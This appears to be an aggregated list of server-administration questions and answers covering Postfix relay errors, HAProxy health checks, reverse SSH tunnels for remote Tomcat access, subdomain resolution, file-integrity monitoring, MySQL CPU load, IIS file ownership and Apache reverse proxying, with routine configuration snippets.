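    "Relay access denied" on inbound mail usually means Postfix does not consider mydomain.com one of its own destination domains. A sketch of the usual check and fix (the domain is the question's placeholder):

        # Show which domains Postfix currently accepts mail FOR
        postconf mydestination

        # Add the domain, then restart
        postconf -e 'mydestination = mydomain.com, localhost.localdomain, localhost'
        /etc/init.d/postfix restart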

    Read the article

  • HAProxy "503 Service Unavailable" for webserver running on a KVM virtual machine

    - by Menda
    I'm setting up a server with KVM (IP 192.168.0.100) and I have created inside it one virtual machine, using network bridging, at 192.168.0.194. This virtual machine has an nginx instance running, which I can access from the server or from any computer on the internal network just by typing http://192.168.0.194 in the browser. However, when I configure HAProxy on the same server that hosts KVM, the HAProxy status page always shows the virtual machine as "DOWN". If I go to http://localhost from the server, it should behave the same as going to http://192.168.0.194. My goal is to build a reverse proxy, but I tried this little example and it won't work. What am I doing wrong? This is my config file on the server:

        # /etc/haproxy/haproxy.cfg
        global
            maxconn 4096
            user haproxy
            group haproxy
            daemon

        defaults
            log global
            mode http
            option httplog
            option dontlognull
            retries 3
            option redispatch
            maxconn 2000
            contimeout 5000
            clitimeout 50000
            srvtimeout 50000

        listen ServerStatus *:8081
            mode http
            stats enable
            stats auth haproxy:haproxy

        listen Server *:80
            mode http
            balance roundrobin
            cookie JSESSIONID prefix
            option httpclose
            option forwardfor
            option httpchk HEAD /check.txt HTTP/1.0
            server mv1 192.168.0.194:80 cookie A check

    Thanks.
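
    One detail that commonly produces a permanent DOWN here: the health check requests /check.txt, and if nginx has no such file, every check fails even though the site itself works. Worth verifying by hand (the path comes from the httpchk line above):

        # Should return 200 if the health-check target exists
        curl -I http://192.168.0.194/check.txt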

    Read the article

  • Exposing a WebServer behind a firewall without Port Forwarding

    - by pbreault
    We are deploying web applications in Java using Tomcat on client machines across the country. Once they are installed, we want to allow remote access to these web applications through a central server, but we do not want our clients to have to open ports on their routers. Is there a way to tunnel the HTTP traffic so that people connected to the central server can access the web applications that are behind a firewall? The central server has a static IP address and we have full control over it. Right now it is a Windows box, but it could be changed to a Linux box if necessary. Our clients are running Windows XP and up. We don't need to access the filesystem; we only want to access the web application through a browser. We have looked at reverse SSH tunneling (see the sketch below), but it has a scaling problem, since every packet would have to pass through the central server.
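
    For reference, the reverse-tunnel variant mentioned looks like this from each client machine (hostnames, user and ports are placeholders); every client exposes its local Tomcat on a distinct port of the central server:

        # Run on the client box: forward central-server port 8101 back to local port 8080
        ssh -N -R 8101:localhost:8080 tunneluser@central.example.com

    Everything does indeed flow through the central box, which is exactly the scaling concern raised above.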

    Read the article

  • How is a subdomain passed to the webserver?

    - by Joshua Frank
    I know that DNS resolves an address like example.com to an IP address like 11.22.33.44, but I'm a little confused about how subdomains are resolved, so that when you type http://subdomain.example.com, what actually gets passed to the server at 11.22.33.44? In other words, example.com = 11.22.33.44, but subdomain.example.com/path = ??? Are "subdomain" and "path" passed as HTTP headers, or mapped in the URL in some way, or what? Thanks in advance. Edit: If I'm understanding correctly, BloodPhilia says that subdomain.example.com actually is a different domain that in principle could resolve to a totally different IP. But if that's so, then what about hosts that have huge numbers of (what look like) subdomains, but which actually map to some path on the site? For instance, blogspot hosts millions of blogs, and they all look like this:

        aaa.blogspot.com
        bbb.blogspot.com
        ...millions more...
        yyy.blogspot.com
        zzz.blogspot.com

    Those are clearly not subdomains with their own IPs, but rather some mapping like aaa.blogspot.com -> www.blogspot.com/aaa, but how is this accomplished? What actually gets passed to the web server at blogspot.com?
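
    The mechanics, for the record: DNS only turns the full hostname (subdomain included, often via a wildcard record like *.blogspot.com) into an IP; nothing of the name is consumed. The browser then sends the whole hostname in the Host header and the path on the request line, and the server picks a site from that header (name-based virtual hosting). A request for http://subdomain.example.com/path literally looks like:

        GET /path HTTP/1.1
        Host: subdomain.example.com

    So blogspot needs only one set of IPs: every aaa.blogspot.com resolves there, and the web server routes to the right blog by inspecting Host.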

    Read the article

  • Webserver security, intrusion detection, and file integrity

    - by enfield
    I would like to add some type of tracking/alerting on some Linux webservers running PHP and Apache. In doing searches I have come across a lot of info from 2006-2009; I would like to revisit things and see what others are doing now. The main purpose here is to track when any files are changed and, if so, alert me somehow. The same goes for IDS, and hopefully something that can reside on the same server? Since some of these are small-scale projects I would prefer open-source/free solutions that are really effective, although I would still like to hear of other alternatives if someone has the experience and the cost can be justified.
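
    At its simplest, file-integrity tracking is a checksum manifest plus a periodic compare, which dedicated tools such as Tripwire or AIDE wrap with signing and policy. A bare-bones sketch of the idea, assuming GNU coreutils and a working local mail command (paths and address are placeholders):

        # Build a baseline of the docroot
        find /var/www -type f -exec md5sum {} + > /root/www.md5

        # Later (e.g. from cron): report anything changed or missing
        md5sum -c --quiet /root/www.md5 | mail -s "integrity alert" admin@example.com

    Note this only catches modified or deleted files; newly added files need a fresh find pass to show up, which is one reason the dedicated tools are worth it.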

    Read the article

  • Webserver max CPU when Apache and MySQL are run together

    - by Tim
    This website has been running fine without issues; recently it went down. After some investigation it looks like the combination of MySQL and Apache brings the box to its knees. Apache runs fine serving static web pages, and MySQL runs fine when the website isn't enabled. As soon as the website is enabled with SQL running, the CPU on the box stays at 100%. Picture of the usage: http://i.stack.imgur.com/GG2NC.png. I've checked the SQL database for errors and tried tuning nearly every performance parameter in the Apache and MySQL conf files. The server is a Red Hat based box running the latest software packages. Any help/suggestions are welcome. Doing an strace on a high-CPU Apache process I see the following:

        read(14, "", 8192)                      = 0
        close(14)                               = 0
        socket(PF_FILE, SOCK_STREAM, 0)         = 14
        fcntl64(14, F_SETFL, O_RDONLY)          = 0
        fcntl64(14, F_GETFL)                    = 0x2 (flags O_RDWR)
        connect(14, {sa_family=AF_FILE, path="/var/lib/mysql/mysql.sock"...}, 110) = 0
        setsockopt(14, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0", 8) = 0
        setsockopt(14, SOL_SOCKET, SO_SNDTIMEO, "\2003\341\1\0\0\0\0", 8) = 0
        setsockopt(14, SOL_IP, IP_TOS, [8], 4)  = -1 EOPNOTSUPP (Operation not supported)
        setsockopt(14, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0

    Here is what I see from a MySQL process:

        futex(0x86fc9a4, FUTEX_WAIT_PRIVATE, 39, NULL) = 0
        futex(0x86fc734, FUTEX_WAIT_PRIVATE, 2, NULL) = 0
        futex(0x86fc734, FUTEX_WAKE_PRIVATE, 1) = 0
        gettimeofday({1301465020, 141613}, NULL) = 0
        clock_gettime(CLOCK_REALTIME, {1301465020, 141699633}) = 0
        futex(0x8707a64, FUTEX_WAIT_PRIVATE, 1, {4, 999913367}) = 0
        futex(0x8707a40, FUTEX_WAIT_PRIVATE, 2, NULL) = 0
        futex(0x8707a40, FUTEX_WAKE_PRIVATE, 1) = 0
        exit_group(0)                           = ?
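
    A first step that usually narrows this down is asking MySQL what it is busy with while the CPU is pegged, and logging slow statements (variable names below are the MySQL 5.1+ spellings):

        # What is running right now?
        mysqladmin -u root -p processlist

        # In /etc/my.cnf under [mysqld], then restart mysqld:
        #   slow_query_log      = 1
        #   slow_query_log_file = /var/log/mysql-slow.log
        #   long_query_time     = 1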

    Read the article

  • IIS WebServer creates new file: ownership?

    - by Beaud.
    IIS is configured for Integrated Windows Authentication. web.config is configured as follows:

        <authentication mode="Windows" />
        <identity impersonate="true" />

    We are load balancing between \\webserver1 and \\webserver2, on Windows Server 2003. \\webserverX creates an XML file on \\share1 and access is denied. We got past the access denial by allowing Everyone to access the share... We would like the impersonated user to be the owner of the created file; instead, \\webserver1's computer account is the owner. How can we make sure that the impersonated user has ownership of the file at creation time? PROGRESSION: I decided to create the file locally in \\webserver1's root directory. The file's owner is NETWORK SERVICE even with impersonate="true", and I'm unable to change ownership of the file in C# code. Why, when creating a file, won't IIS use the impersonated user's write permissions? If it actually does, what am I doing wrong?
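
    For the "change ownership in C#" part, the .NET access-control API does expose it; whether the call succeeds depends on the privileges the worker process holds, which is likely the real blocker here. A sketch (domain, account and path are placeholders):

        using System.IO;
        using System.Security.AccessControl;
        using System.Security.Principal;

        // Assign an explicit owner to a freshly created file.
        // Granting ownership to ANOTHER account requires SeRestorePrivilege,
        // which the default IIS worker identity does not have.
        var path = @"C:\inetpub\wwwroot\output.xml";
        FileSecurity acl = File.GetAccessControl(path);
        acl.SetOwner(new NTAccount("MYDOMAIN", "webuser"));
        File.SetAccessControl(path, acl);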

    Read the article

  • apache mod_proxy or mod_rewrite to hide the root of a webserver behind a path

    - by Giovanni Nervi
    I have two Apache 2.2.21 servers, one external and one internal. I need to map the internal Apache behind a path on the external Apache, but I have some problems with absolute URLs. I tried these configurations:

        RewriteEngine on
        RewriteRule ^/externalpath/(.*)$ http://internal-apache.test.com/$1 [L,P,QSA]
        ProxyPassReverse /externalpath/ http://internal-apache.test.com/

    or

        <Location /externalpath/>
            ProxyPass http://internal-apache.test.com/
            ProxyPassReverse http://internal-apache.test.com/
        </Location>

    My internal Apache uses absolute paths to find resources such as images, CSS and HTML, and I can't change that now. Any suggestions? Thank you
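
    ProxyPassReverse only rewrites HTTP headers (Location and friends), not URLs inside the HTML body, which is why root-absolute links escape /externalpath/. One approach, assuming the third-party mod_proxy_html module is installed on the 2.2 front end:

        <Location /externalpath/>
            ProxyPass http://internal-apache.test.com/
            ProxyPassReverse http://internal-apache.test.com/
            # Rewrite root-absolute links inside proxied HTML bodies
            SetOutputFilter proxy-html
            ProxyHTMLURLMap / /externalpath/
        </Location>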

    Read the article
